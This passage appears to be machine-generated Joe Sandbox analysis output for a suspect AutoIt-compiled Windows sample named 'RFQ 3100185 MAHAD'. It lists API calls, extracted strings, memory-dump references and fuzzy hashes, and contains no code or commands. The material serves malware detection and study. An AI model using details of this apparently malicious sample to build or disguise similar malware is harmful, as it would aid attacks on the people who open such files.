                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0081D670
                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0081D698
                                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0081D6BF
                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 0081D6DD
                                                            • DrawFocusRect.USER32(?,?), ref: 0081D6E8
                                                            • GetSysColor.USER32(00000011), ref: 0081D6F6
                                                            • SetTextColor.GDI32(?,00000000), ref: 0081D6FE
                                                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0081D712
                                                            • SelectObject.GDI32(?,0081D2A5), ref: 0081D729
                                                            • DeleteObject.GDI32(?), ref: 0081D734
                                                            • SelectObject.GDI32(?,?), ref: 0081D73A
                                                            • DeleteObject.GDI32(?), ref: 0081D73F
                                                            • SetTextColor.GDI32(?,?), ref: 0081D745
                                                            • SetBkColor.GDI32(?,?), ref: 0081D74F
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                            • String ID:
                                                            • API String ID: 1996641542-0
                                                            • Opcode ID: 03dad0765271ef6626a6afe11547bddb66ec6d77323eafddd89d60bdfd76daa9
                                                            • Instruction ID: f138fbafd23f66cf017265de2230858a30051e44962c2df9b689ebff997d45be
                                                            • Opcode Fuzzy Hash: 03dad0765271ef6626a6afe11547bddb66ec6d77323eafddd89d60bdfd76daa9
                                                            • Instruction Fuzzy Hash: 25511B72900218EFDF109FA4EC48EEEBB7AFF48324F104915F915AB2A1D7759A40DB90
                                                            APIs
                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0081B7B0
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0081B7C1
                                                            • CharNextW.USER32(0000014E), ref: 0081B7F0
                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0081B831
                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0081B847
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0081B858
                                                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0081B875
                                                            • SetWindowTextW.USER32(?,0000014E), ref: 0081B8C7
                                                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0081B8DD
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 0081B90E
                                                            • _memset.LIBCMT ref: 0081B933
                                                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0081B97C
                                                            • _memset.LIBCMT ref: 0081B9DB
                                                            • SendMessageW.USER32 ref: 0081BA05
                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 0081BA5D
                                                            • SendMessageW.USER32(?,0000133D,?,?), ref: 0081BB0A
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0081BB2C
                                                            • GetMenuItemInfoW.USER32(?), ref: 0081BB76
                                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0081BBA3
                                                            • DrawMenuBar.USER32(?), ref: 0081BBB2
                                                            • SetWindowTextW.USER32(?,0000014E), ref: 0081BBDA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                            • String ID: 0
                                                            • API String ID: 1073566785-4108050209
                                                            • Opcode ID: 4ae3e367662fc7e0be3ba714e6b257ac17ec596e632c6c50c11ca98d24ea5135
                                                            • Instruction ID: 8e42d5431187985d6f695c4362fc90a65c208862dabceca1cce8cb3766759941
                                                            • Opcode Fuzzy Hash: 4ae3e367662fc7e0be3ba714e6b257ac17ec596e632c6c50c11ca98d24ea5135
                                                            • Instruction Fuzzy Hash: F0E19F71900218ABDF209F65DC89EEE7B7CFF15724F14815AF929EA290D7748A81CF60
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 0081778A
                                                            • GetDesktopWindow.USER32 ref: 0081779F
                                                            • GetWindowRect.USER32(00000000), ref: 008177A6
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00817808
                                                            • DestroyWindow.USER32(?), ref: 00817834
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0081785D
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0081787B
                                                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 008178A1
                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 008178B6
                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 008178C9
                                                            • IsWindowVisible.USER32(?), ref: 008178E9
                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00817904
                                                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00817918
                                                            • GetWindowRect.USER32(?,?), ref: 00817930
                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00817956
                                                            • GetMonitorInfoW.USER32 ref: 00817970
                                                            • CopyRect.USER32(?,?), ref: 00817987
                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 008179F2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                            • String ID: ($0$tooltips_class32
                                                            • API String ID: 698492251-4156429822
                                                            • Opcode ID: 792c06d33d038e2b935b752a937a1923d89b0123e17795bd6b5e0091cd8763eb
                                                            • Instruction ID: e561a10e6394bf242e9f0fcfd556f07532fb856b2a0e37e6f8cf7d960321b225
                                                            • Opcode Fuzzy Hash: 792c06d33d038e2b935b752a937a1923d89b0123e17795bd6b5e0091cd8763eb
                                                            • Instruction Fuzzy Hash: B8B17B71608340AFDB04DF64C949BAABBE9FF88310F00891DF599DB291DB74E844CB96
                                                            APIs
                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 007F6CFB
                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 007F6D21
                                                            • _wcscpy.LIBCMT ref: 007F6D4F
                                                            • _wcscmp.LIBCMT ref: 007F6D5A
                                                            • _wcscat.LIBCMT ref: 007F6D70
                                                            • _wcsstr.LIBCMT ref: 007F6D7B
                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 007F6D97
                                                            • _wcscat.LIBCMT ref: 007F6DE0
                                                            • _wcscat.LIBCMT ref: 007F6DE7
                                                            • _wcsncpy.LIBCMT ref: 007F6E12
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                            • API String ID: 699586101-1459072770
                                                            • Opcode ID: ccd9408e0a6bdf414d267a61da4deda8e33d48148d55324898b797ec16ff8f26
                                                            • Instruction ID: 6532ee4aa94d00310b10b136fab0b41a04a82445617872e5140576778bfddb60
                                                            • Opcode Fuzzy Hash: ccd9408e0a6bdf414d267a61da4deda8e33d48148d55324898b797ec16ff8f26
                                                            • Instruction Fuzzy Hash: 8A41A672600214BBEB04AB64DD4BEBF777CEF51710F14006AFA15E6382EA7C9A1196A1
                                                            APIs
                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007CA939
                                                            • GetSystemMetrics.USER32(00000007), ref: 007CA941
                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007CA96C
                                                            • GetSystemMetrics.USER32(00000008), ref: 007CA974
                                                            • GetSystemMetrics.USER32(00000004), ref: 007CA999
                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 007CA9B6
                                                            • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 007CA9C6
                                                            • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 007CA9F9
                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 007CAA0D
                                                            • GetClientRect.USER32(00000000,000000FF), ref: 007CAA2B
                                                            • GetStockObject.GDI32(00000011), ref: 007CAA47
                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 007CAA52
                                                              • Part of subcall function 007CB63C: GetCursorPos.USER32(000000FF), ref: 007CB64F
                                                              • Part of subcall function 007CB63C: ScreenToClient.USER32(00000000,000000FF), ref: 007CB66C
                                                              • Part of subcall function 007CB63C: GetAsyncKeyState.USER32(00000001), ref: 007CB691
                                                              • Part of subcall function 007CB63C: GetAsyncKeyState.USER32(00000002), ref: 007CB69F
                                                            • SetTimer.USER32(00000000,00000000,00000028,007CAB87), ref: 007CAA79
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                            • String ID: AutoIt v3 GUI
                                                            • API String ID: 1458621304-248962490
                                                            • Opcode ID: a7283d4c2b4a0ee08d0fcc1331a2cdc594e8583d76811ea616afe31c491d7d54
                                                            • Instruction ID: 528211571afae04b89c6165ff593b8f1a9e13f76589a90f1d60a1bdd1cfd34cb
                                                            • Opcode Fuzzy Hash: a7283d4c2b4a0ee08d0fcc1331a2cdc594e8583d76811ea616afe31c491d7d54
                                                            • Instruction Fuzzy Hash: 92B15A71A0021AAFDF14DFA8DC4AFAE7BB4FB58315F114219FA15E6290DB34E881CB51
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Window$Foreground
                                                            • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                            • API String ID: 62970417-1919597938
                                                            • Opcode ID: 0ff4d051552513a16b50fc540adcad35265f786bcbd7f6f64ed8c0230514ef2b
                                                            • Instruction ID: 96286c465dd0cc595f4ebc9f8c8207a5d3fb6e04c048104d30947243a4372b95
                                                            • Opcode Fuzzy Hash: 0ff4d051552513a16b50fc540adcad35265f786bcbd7f6f64ed8c0230514ef2b
                                                            • Instruction Fuzzy Hash: D6D1E430104746EBCB14EF60D885AAAFBB0FF54344F004A1DF456D72A2DB78E99ACB91
                                                            APIs
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00813735
                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,0084DC00,00000000,?,00000000,?,?), ref: 008137A3
                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 008137EB
                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00813874
                                                            • RegCloseKey.ADVAPI32(?), ref: 00813B94
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00813BA1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Close$ConnectCreateRegistryValue
                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                            • API String ID: 536824911-966354055
                                                            • Opcode ID: b995693b0fd6af9eebf7394935e896ef80caad6d4e4779cb203970b23a0063e3
                                                            • Instruction ID: b0e42336c3b6287a5ba9f33367ffbd59ee9ac7171de34c9d3de6410902ff4f0c
                                                            • Opcode Fuzzy Hash: b995693b0fd6af9eebf7394935e896ef80caad6d4e4779cb203970b23a0063e3
                                                            • Instruction Fuzzy Hash: 11022575204601DFCB14EF24C859A6AB7E9FF88720F05885DF99A9B3A1DB34ED41CB81
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 00816C56
                                                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00816D16
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: BuffCharMessageSendUpper
                                                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                            • API String ID: 3974292440-719923060
                                                            • Opcode ID: bd62034eb157f28275d8b3326fc2d3aff4bc8c32b4ef01da8d6cf0c4feee469d
                                                            • Instruction ID: fda4f35f3ca72426e6a42c46ff1dd0f6c796b791cbf0a584a0e24ef4fb37fea0
                                                            • Opcode Fuzzy Hash: bd62034eb157f28275d8b3326fc2d3aff4bc8c32b4ef01da8d6cf0c4feee469d
                                                            • Instruction Fuzzy Hash: 14A19E30204245DBCB14EF20C956BAAB7A9FF44314F10496CB996DB3D2EB35EC5ACB51
                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 007ECF91
                                                            • __swprintf.LIBCMT ref: 007ED032
                                                            • _wcscmp.LIBCMT ref: 007ED045
                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 007ED09A
                                                            • _wcscmp.LIBCMT ref: 007ED0D6
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 007ED10D
                                                            • GetDlgCtrlID.USER32(?), ref: 007ED15F
                                                            • GetWindowRect.USER32(?,?), ref: 007ED195
                                                            • GetParent.USER32(?), ref: 007ED1B3
                                                            • ScreenToClient.USER32(00000000), ref: 007ED1BA
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 007ED234
                                                            • _wcscmp.LIBCMT ref: 007ED248
                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 007ED26E
                                                            • _wcscmp.LIBCMT ref: 007ED282
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                            • String ID: %s%u
                                                            • API String ID: 3119225716-679674701
                                                            • Opcode ID: 7fe2a2d5368ca62604de930d1652a8df2d30f9d3a2e424784d3cc8354970269b
                                                            • Instruction ID: 9cf11ce0333b5d9a22a3dd5e82d302c2f34904b1ca24eb75281587478a62ee80
                                                            • Opcode Fuzzy Hash: 7fe2a2d5368ca62604de930d1652a8df2d30f9d3a2e424784d3cc8354970269b
                                                            • Instruction Fuzzy Hash: 06A1E371605346EFD725DF65C884FAAB7A8FF48314F008919FA69D2180EB38EE05CB91
                                                            APIs
                                                            • GetClassNameW.USER32(00000008,?,00000400), ref: 007ED8EB
                                                            • _wcscmp.LIBCMT ref: 007ED8FC
                                                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 007ED924
                                                            • CharUpperBuffW.USER32(?,00000000), ref: 007ED941
                                                            • _wcscmp.LIBCMT ref: 007ED95F
                                                            • _wcsstr.LIBCMT ref: 007ED970
                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 007ED9A8
                                                            • _wcscmp.LIBCMT ref: 007ED9B8
                                                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 007ED9DF
                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 007EDA28
                                                            • _wcscmp.LIBCMT ref: 007EDA38
                                                            • GetClassNameW.USER32(00000010,?,00000400), ref: 007EDA60
                                                            • GetWindowRect.USER32(00000004,?), ref: 007EDAC9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                            • String ID: @$ThumbnailClass
                                                            • API String ID: 1788623398-1539354611
                                                            • Opcode ID: d0c70a4a4f11d343fb0320935bb83c771c8098b7c3aaeed1dbfd781ffe424c8d
                                                            • Instruction ID: 32d05877b18749f14f9c46665618a2c5cdd1dc8780c9c804c338e1f4ca6deb1f
                                                            • Opcode Fuzzy Hash: d0c70a4a4f11d343fb0320935bb83c771c8098b7c3aaeed1dbfd781ffe424c8d
                                                            • Instruction Fuzzy Hash: 1181F8710093859FDB11DF15C885FAA7BE8FF88314F04846AFD899A096E738ED45CBA1
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                            • API String ID: 1038674560-1810252412
                                                            • Opcode ID: c7d5d8ff8db8bfe08ef1a50e4ca061eeabf93119057a4b15f1eb0c34bd866598
                                                            • Instruction ID: d549ce18dc7bc158dfa15b0a6cf8b33d01cd8f7e4e1f9c63cf19034bf4ee5db2
                                                            • Opcode Fuzzy Hash: c7d5d8ff8db8bfe08ef1a50e4ca061eeabf93119057a4b15f1eb0c34bd866598
                                                            • Instruction Fuzzy Hash: 6731CE31A44649EAEB24FB51CD57FEEB3B4EF24354F200069F451B11D1EB6DAE04C651
                                                            APIs
                                                            • LoadIconW.USER32(00000063), ref: 007EEAB0
                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 007EEAC2
                                                            • SetWindowTextW.USER32(?,?), ref: 007EEAD9
                                                            • GetDlgItem.USER32(?,000003EA), ref: 007EEAEE
                                                            • SetWindowTextW.USER32(00000000,?), ref: 007EEAF4
                                                            • GetDlgItem.USER32(?,000003E9), ref: 007EEB04
                                                            • SetWindowTextW.USER32(00000000,?), ref: 007EEB0A
                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 007EEB2B
                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 007EEB45
                                                            • GetWindowRect.USER32(?,?), ref: 007EEB4E
                                                            • SetWindowTextW.USER32(?,?), ref: 007EEBB9
                                                            • GetDesktopWindow.USER32 ref: 007EEBBF
                                                            • GetWindowRect.USER32(00000000), ref: 007EEBC6
                                                            • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 007EEC12
                                                            • GetClientRect.USER32(?,?), ref: 007EEC1F
                                                            • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 007EEC44
                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 007EEC6F
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                            • String ID:
                                                            • API String ID: 3869813825-0
                                                            • Opcode ID: a5e04eff288a8a8207cc6be0837bb531665b92c30312f91c75f0c9898e89fa04
                                                            • Instruction ID: ee16bf4cc6d404855ce0d0df76ec3c0de107135de5b5a13d1e14665dcfd9a294
                                                            • Opcode Fuzzy Hash: a5e04eff288a8a8207cc6be0837bb531665b92c30312f91c75f0c9898e89fa04
                                                            • Instruction Fuzzy Hash: 56517C70900749EFDB20DFA9DD8AF6EBBF5FF48704F004928E696A25A0D774A944CB50
                                                            APIs
                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 008079C6
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 008079D1
                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 008079DC
                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 008079E7
                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 008079F2
                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 008079FD
                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00807A08
                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 00807A13
                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 00807A1E
                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00807A29
                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00807A34
                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 00807A3F
                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00807A4A
                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 00807A55
                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00807A60
                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00807A6B
